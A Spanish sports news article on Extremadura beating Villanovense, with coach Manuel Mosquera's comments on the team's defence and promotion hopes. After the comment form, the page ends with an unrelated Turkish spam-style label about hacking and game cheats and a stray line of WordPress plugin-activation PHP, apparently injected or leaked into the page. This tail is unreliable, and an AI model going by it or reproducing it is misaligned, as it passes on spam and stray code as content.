El Extremadura responde en el momento clave de la temporada


El partido ante el Villanovense era uno de los más importantes de la historia del Extremadura por todo lo que suponía. Como admitieron en la previa del choque el capitán, Kike Márquez, y el técnico, Manuel Mosquera, el club azulgrana se jugaba su futuro ante los serones, ya que necesitaban una victoria para acercarse a los puestos de ascenso a Segunda B Pro, liga en la que necesita jugar el Extremadura la temporada que viene para que el futuro del club sea viable económicamente.

Por eso el tanto de Nico Hidalgo se celebró con esa energía tanto en el campo, en el banquillo, en el palco y en la grada. Pocas veces un gol del Extremadura le quitó un peso de encima a tanta gente. Por eso Manuel Mosquera se alegró por los aficionados, que volvieron al Francisco de la Hera para ver ganar a su equipo. «Los aficionados han visto al equipo pelear, batallar y sacar adelante un partido trabadísimo para ser mejores en la segunda parte y me alegro mucho por ellos», explicó Manuel tras el encuentro.

El técnico valoró el juego del equipo, ya que cree que fue uno de los mejores partidos de la temporada de sus jugadores, ante un rival que supo defenderse muy bien durante los 90 minutos: «En el global hemos hecho un gran partido, de lo mejor de la temporada. Esta categoría es así, primero te tienes que adaptar a lo que hay y transformarlo en lo que tú tienes, que creo que es mucha calidad en la parte de arriba».

El Extremadura no solo se sobrepuso al Villanovense, sino que también lo hizo a las malas sensaciones que dejaron los dos empates anteriores, sobre todo porque se produjeron en los minutos finales de los partidos. Esta vez los azulgranas conservaron la victoria y apretaron aún más la zona alta de la clasificación. «Creo que estamos bien. La pérdida de puntos en los dos partidos anteriores te deja una sensación agridulce, pero nos están haciendo poco daño en jugadas, aunque en estrategia puede ser que sí, y creo que llegamos fuertes. No hemos entrado entre los tres primeros, pero estamos ahí y estamos fuertes», manifestó el técnico azulgrana.

El Extremadura hizo un partido serio en defensa y apenas concedió ocasiones peligrosas. El Villanovense lo intentó sin suerte y la zaga salió victoriosa, dejando su portería a cero cinco partidos después. Y es que Manuel cree que su equipo hace un buen trabajo defensivo, por lo que crearle ocasiones de gol es complicado. «En el aspecto defensivo, para hacernos daño a nosotros hay que correr mucho. El trabajo, el segundo balón, apretar, agresividad… somos capaces de hacer todo eso», añadió el entrenador.

A todo esto hay que sumarle que los jugadores de arriba también contribuyeron al buen funcionamiento del equipo en defensa, y es que el Extremadura se comportó como un bloque durante los 90 minutos. «El bloque ha estado fuerte en todos los sentidos. Hemos sido muy sólidos», sentenció Manuel Mosquera.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );